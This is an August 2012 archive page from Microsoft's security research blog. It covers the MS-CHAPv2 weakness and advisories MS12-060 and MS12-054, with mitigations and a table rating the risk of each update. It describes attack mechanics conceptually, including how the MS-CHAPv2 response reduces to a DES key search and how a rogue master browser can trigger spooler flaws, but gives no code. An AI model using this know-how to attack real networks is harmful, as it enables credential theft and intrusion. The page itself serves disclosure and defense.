Security Research & Defense

Information from Microsoft about vulnerabilities, mitigations and workarounds, active attacks, security research, tools and guidance

August, 2012

  • Weaknesses in MS-CHAPv2 authentication

    MS-CHAP is the Microsoft version of the Challenge-Handshake Authentication Protocol and is described in RFC2759.  A recent presentation by Moxie Marlinspike [1] has revealed a breakthrough which reduces the security of MS-CHAPv2 to a single DES encryption (2^56) regardless of the password length.  Today, we published Security Advisory 2743314 with recommendations to mitigate the effects of this issue.

    Any potential attack would require a man in the middle situation in which a third party can get all the traffic between the client and authenticator during the authentication.

    Without going into much detail about the MS-CHAPv2 protocol, we will just discuss the part that would be affected by this type of attack: the challenge and response authentication.  This is how the client responds to the challenge sent by the authenticator:

    • The authenticator sends a 16 byte challenge: CS
    • The client generates a 16 byte challenge: CC
    • The client hash the authenticator challenge, client challenge, username and create an 8 byte block: C
    • The client uses the MD4 algorithm to hash the password: H
    • The clients pad H with 5 null byte to obtain a block of 21 bytes and breaks it into 3 DES keys: K1,K2,K3.
    • The client encrypts the block C with each one of K1,K2 and K3 to create the response: R.
    • The client send back R,C and the username.

    Or:

    C=SHA1(CS,CC,UNAME)
    P=MD4(PASSWORD)
    K1|K2|K3=P|5 byte of 0
    R=DES(K1,C)|DES(K2,C)|DES(K3,C)

    There are several issues in this algorithm that combined together can result in the success of this type of attack.

    First, all elements of the challenge and response beside the MD4 of the password are sent in clear over the wire or could be easily calculated from items that are sent over the wire. This means that for a man in the middle attacker, the gain of the password hash will be enough to re-authenticate.

    Secondly, the key derivation is particularly weak. Padding with 5 bytes of zero means that the last DES key has only a key space of 2^16.

    Lastly, the same plaintext is encrypted with K1 and K2, which means a single key search of 2^56 is enough to break both K1 and K2.

    Once the attacker has K1, K2 and K3 he has the MD4 of the password which is enough to re-authenticate.

    - Ali Rahbar, MSRC Engineering

    [1]- https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

  • MS12-060: Addressing a vulnerability in MSCOMCTL.OCX's TabStrip control

    Today we released MS12-060, addressing a potential remote code execution vulnerability in MSCOMCTL.OCX, the binary included with a number of Microsoft products to provide a set of common ActiveX controls.

    Limited, targeted attacks exploiting CVE-2012-1856

    MS12-060 is on the list of high priority updates for this month for two reasons: we are aware of very limited, targeted attacks taking advantage of CVE-2012-1856 and we expect to see new attacks taking advantage of this vulnerability in days ahead. We discovered this vulnerability in a malicious RTF file sent by email which attempted to run an exploit when opened with WordPad or Microsoft Word. Deploying MS12-060 will address the vulnerability and will protect against attacks. So once again we emphasize the urgency of applying this update as soon as possible.

    Comparing MS12-060 to MS12-027 (previous MSCOMCTL bulletin)

    MS12-060 addresses a different vulnerability than was addressed by the previous MSCOMCTL security update, MS12-027. The previous vulnerability (CVE-2012-0158) was a stack-based buffer overflow affecting both TreeView and ListView controls. MS12-060 instead fixes a different issue (CVE-2012-1856) caused by a wrong memory allocation present in the code of the TabStrip control. In both cases code execution is possible, but exploitation methods are very different. We expect to see attacks exploiting CVE-2012-1856 delivered as Office documents and mostly as RTF file due to the antivirus signature evasion options offered by RTF format that we previously observed watching the CVE-2012-0158 MSCOMCTL vulnerability.

    Office mitigations against embedded controls

    Microsoft Office includes various on-by-default mitigations and a range of optional security features that, added on top of MS12-060 security update, will offer additional protection layers against suspicious documents with embedded ActiveX controls (such as MSCOMCTL) or other potentially harmful active content. All these mitigations and additional protection settings have been covered and explained in details with a previous blog available at http://blogs.technet.com/b/srd/archive/2012/04/10/ms12-027-enhanced-protections-regarding-activex-controls-in-microsoft-office-documents.aspx. All the protection settings discussed in the previous blog, such as Office kill bit and Protected View, are valid defensive measures that will harden Office against similar attacks. The vulnerable CLSID for CVE-2012-1856 is 1EFB6596-857C-11D1-B16A-00C0F0283628.

    One more additional protection layer that we found useful against RTF-based attacks is enabling by default the Protected View feature for all RTF files from the Office Trust Center panel. A simple setting that prevents automatic loading of embedded controls and active content in RTF documents. The Trust Center panel offers two possible configurations: opening RTF files in Protected View with or without editing features enabled. Opening the document in Protected View without editing will block attacks based on embedded controls while still allowing reading/viewing RTF documents. It is a very good safeguard against malicious RTF files with embedded controls.

     

    Deploying EMET to mitigate the risk

    Finally, we noticed that the Enhanced Mitigation Experience Toolkit (EMET) is able to mitigate or neutralize exploitation attempts for this vulnerability and so we encourage customers who want to add an additional layer of protection on top of the MS12-060 security update to consider deploying EMET at least to protect browser programs and Office applications on client machines. EMET 3.0 can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=29851.

    Acknowledgement

    Thanks to Ali Rahbar and Ali Pezeshk from MSRC Engineering for the help investigating this vulnerability.

    - Elia Florio, MSRC Engineering

  • MS12-054: Not all remote, pre-auth vulnerabilities are equally appetizing for worms..

    We released security update MS12-054 to address four privately reported issues in Windows networking components failing to properly handle malformed Remote Administration Protocol (RAP) responses. The most severe of these issues, CVE-2012-1851, is a format string vulnerability in the printer spooler service while handling a response message and is a wormable-class vulnerability on Windows XP and Windows Server 2003. At least, sort of wormable. This blog post will explain the attack scenario and the limited affected platforms to help you assess the risk this vulnerability poses to your environment.

    What is the RAP protocol?

    Windows workgroups and domains maintain a lookup list of network resources such as printers, SQL servers, and file servers. Each time a new resource becomes available (such as a new printer being shared or a SQL Server booting up), the server hosting the resource notifies the subnet’s master browser (or backup browser). Any application or workstation that needs a specific type of resource can then query its subnet’s master browser or backup browser to respond with a list of resources of the requested type. The MSDN NetServerEnum documentation explains how an application can query the subnet browser for network resources and the type of resources available to be queried. Amongst other uses, the Remote Administration Protocol (RAP) is the protocol included with Windows to perform these types of administrative functions. 

    Potential Attack Scenario

    All four vulnerabilities addressed by MS12-054 are client-side parsing issues of malformed RAP responses. To trigger the vulnerability by sending a malicious response, an attacker would need to either act as a subnet’s browser or populate the legitimate master/backup browser’s lookup table with malformed records which would be relayed to clients when they request a resource of a certain type. Windows XP users face the most significant risk from these vulnerabilities, as indicated in the affected products chart at the end of this blog post. A commonly exercised user experience path that initiates a NetServerEnum call (and subsequent RAP request) is the Windows XP “View workgroup computers” link in the “My Network Places” dialog box, shown below:

     

    How is this “wormable”?

    In addition to the "My Network Places" user-initiated scenario above, several "on-by-default" scenarios also exist on Windows XP.  For example, winlogon initiates a request using this protocol to find domain controllers.  The client-side group policy component also initiates RAP requests to which a malicious subnet browser could return a malformed attack response.  CVE-2012-1851, as an example, involves the print spooler service on Windows XP and Windows Server 2003, a service that regularly polls/queries the subnet browser for a list of shared printers.  It would be "wormable" given the following conditions:

    • Victim workstations running Windows XP or Windows Server 2003
    • Attacker is capable of being elected master browser on the victim’s subnet
        OR
      Attacker is able to populate the real master browser’s printer list with a malformed record
        AND
      Print Browsing group policy option is enabled on the real master browser.
    • Workstation Service (LanMan) running on victim workstation.
    • Printer spooler service running on victim workstation.

    Every two minutes, the victim’s print spooler service will call the NetServerEnum API to enumerate shared, available printers. This instructs the Workstation service to initiate a RAP request over SMB to the subnet's browser. The subnet browser could then potentially send back a malformed response which would be passed to the spooler service, triggering the vulnerability. The chart below describes the flow.

    Affected Platforms

    The affected platforms list is full of good news for customers that have migrated to newer versions of Windows. First, two of the vulnerabilities (CVE-2012-1852 and CVE-2012-1853) affect only Windows XP. The vulnerability affecting the Browser service (CVE-2012-1850) is rated Moderate on Vista and later platforms because the Browser service is off by default starting with Windows Vista. And, finally, the print spooler service code execution vulnerability (CVE-2012-1851) manifests only as a denial-of-service on Windows Vista and does not affect later platforms at all in their default configuration.

    The table below summarizes the risk per platform:

      Windows XP Windows Server 2003 Windows Vista Windows 7 Windows Server 2008 & Windows Server 2008 R2
    CVE-2012-1850 Denial of Service. Denial of Service. Not affected by default. (Browser service disabled) Not affected by default. (Browser service disabled) Not affected by default. (Browser service disabled)
    CVE-2012-1851 Potential code execution as SYSTEM. Potential code execution as SYSTEM. Denial of Service. Not affected by default. (Browser service disabled) Not affected by default. (Browser service disabled)
    CVE-2012-1852 Potential code execution as logged-on user or service account, depending on vector. Not affected. Not affected. Not affected. Not affected.
    CVE-2012-1853 Potential code execution as logged-on user or service account, depending on vector. Not affected. Not affected. Not affected. Not affected.

    We hope this information helps you assess the risk of this “sort of wormable” issue in your environment. Please let us know if you have any questions.

    - Jonathan Ness, Neil Sikka, and Gangadhara Swamy, MSRC Engineering

  • Assessing risk for the August 2012 security updates

    Today we released nine security bulletins addressing 26 CVE’s (13 Microsoft and 13 Oracle CVE’s). Five of the bulletins have a maximum severity rating of Critical and the other four have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.

    Bulletin Most likely attack vector Max Bulletin Severity Max Exploit-ability Rating Likely first 30 days impact Platform mitigations and key notes
    MS12-060

    (Windows Common Controls)

    Attackers have leveraged this vulnerability in limited, targeted attacks by emailing malicious RTF file to victims. Victim opens RTF in WordPad or Word, triggering code execution in context of logged-on user. The vulnerability could also be triggered by browsing to a malicious webpage. Critical 1 Limited, targeted attacks in the wild currently.

    See this SRD blog post for more detail about this specific vulnerability, how it differs from the previous MSCOMCTL issue released in April, and workaround options we recommend to harden against any future vulnerabilities in this component.

    This vulnerability cannot be triggered from within Outlook's preview pane.  The email-based RTF attack vector would require double-clicking the RTF attachment.

    MS12-052

    (Internet Explorer)

    Victim browses to a malicious webpage. Critical 1 Likely to see reliable exploits developed within next 30 days.  
    MS12-054

    (Windows Networking Components)

    Attacker on an enterprise network (or after having been elected master browser in a workgroup) makes available a shared resource (such as a printer) with a malformed name. Victim workstations at each startup and at regular intervals query master browser for list of shared resources. Malformed attacker name in this list triggers vulnerability in a service (such as the spooler service) on victim workstations. Critical 1 Likely to see reliable exploits developed within next 30 days. Windows Vista and later platforms affected by default only by denial-of-service issue, not the code execution vulnerability. See this SRD blog post for more background on the issue.
    MS12-058

    (Oracle Outside In for Exchange)

    Attacker sends email with malicious attachment and lures victim to view the attachment as a webpage within Outlook Web Access. The attacker could potentially compromise the server-side process generating the web page. Critical 1 Likely to see reliable exploits developed within next 30 days. Oracle Outside In process runs at a lower privilege level, LocalService. For more background information, please see this SRD blog post.
    MS12-053

    (Terminal Services)

    Attacker sends malicious Remote Desktop Protocol (RDP) request to a Windows XP victim running Terminal Services, potentially executing code as SYSTEM before authentication is required. Critical 2 Less likely to see a reliable exploit developed in the next 30 days. Affects only Windows XP workstations that have enabled Remote Desktop.

    MS12-055

    (Windows drivers [win32k.sys])

    Attacker running code on a machine already elevates from low-privileged account to SYSTEM. Important 1 Likely to see an exploit released granting a local attacker SYSTEM level access.  
    MS12-059

    (Visio)

    Victim opens malicious Visio .DXF file. Important 1 Visio exploits not often seen in the wild. Unsure whether we will see exploit released. Visio not installed by default with most Office installations.
    MS12-056

    (JScript, VBScript)

    Victim browses to a malicious webpage on a 64-bit system having 8GB+ of RAM. Must be running 64-bit of Internet Explorer. Important 2 Less likely to see a reliable exploit developed in next 30 days. Only 64-bit versions of Internet Explorer running on 64-bit systems having more than 8GB of RAM are affected.
    MS12-057

    (Office)

    Victim opens a malicious Office document having a corrupted CGM file. Important 3 Unlikely to see a reliable exploit developed in next 30 days. The CGM graphics filter was disabled with MS10-105. This security update addresses an upgrade scenario in which graphics filter was not properly disabled.

    In addition to the nine new security bulletins, we have re-released MS12-043 to make available a security update for Microsoft XML Core Services 5.0 that was unavailable at the time of initial release.

    Finally, we have also released a new security advisory, KB 2661254, to inform customers of an update available on the Download Center that restricts the use of certificates with RSA keys less than 1024 bits in length. This advisory announces that we plan to release this update through Microsoft Update in October, 2012 after customers have a chance to evaluate their unique environments with the update and take necessary actions to use certificates of 1024 or greater bit length.

    - Jonathan Ness, MSRC Engineering